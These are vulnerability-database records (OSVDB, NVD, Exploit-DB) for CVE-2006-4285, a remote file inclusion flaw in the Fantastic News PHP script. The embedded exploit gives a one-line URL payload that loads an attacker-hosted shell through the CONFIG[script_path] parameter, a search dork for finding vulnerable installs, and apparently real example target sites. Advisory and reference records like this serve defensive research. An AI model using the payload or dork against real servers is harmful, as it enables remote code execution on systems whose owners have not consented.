{"type": "osvdb", "published": "2006-08-19T06:34:02", "href": "https://vulners.com/osvdb/OSVDB:28031", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 12, "edition": 1, "reporter": "OSVDB", "title": "Fantastic News news.php CONFIG[script_path] Variable Remote File Inclusion", "affectedSoftware": [], "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:12", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4285"]}, {"type": "exploitdb", "idList": ["EDB-ID:2221"]}], "modified": "2017-04-28T13:20:12", "rev": 2}, "vulnersScore": 6.9}, "references": [], "id": "OSVDB:28031", "lastseen": "2017-04-28T13:20:12", "cvelist": ["CVE-2006-4285"], "modified": "2006-08-19T06:34:02", "description": "## Manual Testing Notes\nhttp://[target]/[Script Path]/news.php?CONFIG[script_path]=http://[attacker]?\n## References:\nVendor URL: http://fscripts.com/free.php?id=1\n[Secunia Advisory ID:21571](https://secuniaresearch.flexerasoftware.com/advisories/21571/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2221\nFrSIRT Advisory: ADV-2006-3336\n[CVE-2006-4285](https://vulners.com/cve/CVE-2006-4285)\nBugtraq ID: 19613\n"}

{"cve": [{"lastseen": "2021-02-02T05:27:23", "description": "PHP remote file inclusion vulnerability in news.php in Fantastic News 2.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[script_path] parameter. NOTE: it was later reported that 2.1.5 is also affected.", "edition": 4, "cvss3": {}, "published": "2006-08-22T17:04:00", "title": "CVE-2006-4285", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4285"], "modified": "2018-10-17T21:34:00", "cpe": ["cpe:/a:fscripts:fantastic_news:2.1.3", "cpe:/a:fscripts:fantastic_news:2.1.5", "cpe:/a:fscripts:fantastic_news:2.1.1", "cpe:/a:fscripts:fantastic_news:2.1.2"], "id": "CVE-2006-4285", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4285", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fscripts:fantastic_news:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.5:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T15:47:13", "description": "Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability. CVE-2006-4285. Webapps exploit for php platform", "published": "2006-08-19T00:00:00", "type": "exploitdb", "title": "Fantastic News <= 2.1.3 script_path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4285"], "modified": "2006-08-19T00:00:00", "id": "EDB-ID:2221", "href": "https://www.exploit-db.com/exploits/2221/", "sourceData": "#==============================================================================================\n#Fantastic News <= v2.1.3 (CONFIG[script_path]) Remote File Inclusion Exploit\n#===============================================================================================\n# \n#Critical Level : Dangerous \n# \n#Venedor site : http://fscripts.com/ \n# \n#Version : v2.1.2 & v2.1.3 \n# \n#================================================================================================\n#\n#Dork : \"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"\n#\n#================================================================================================\n#\n#Bug in : news.php\n#\n#Vlu Code :\n#--------------------------------\n# require_once($CONFIG['script_path'].\"config.php\");\n# require_once($CONFIG['script_path'].\"functions/functions.php\");\n# require_once($CONFIG['script_path'].\"functions/mysql.php\");\n# require_once($CONFIG['script_path'].\"functions/template.php\");\n#\n#================================================================================================\n#\n#Exploit :\n#--------------------------------\n#\n#http://sitename.com/[Script Path]/news.php?CONFIG[script_path]=http://SHELLURL.COM?\n#\n#Example :\n# http://fscripts.com/ ====> vendor site =)) hahahahaaaaaa ====> 2.1.3\n# http://lnx.evanescencewebsite.com/PressArchive =====> 2.1.2\n#\n#\n#\n#================================================================================================\n#Discoverd By : SHiKaA\n#\n#Conatact : SHiKaA-[at]hotmail.com\n#\n#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)\n==================================================================================================\n\n# milw0rm.com [2006-08-19]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2221/"}]}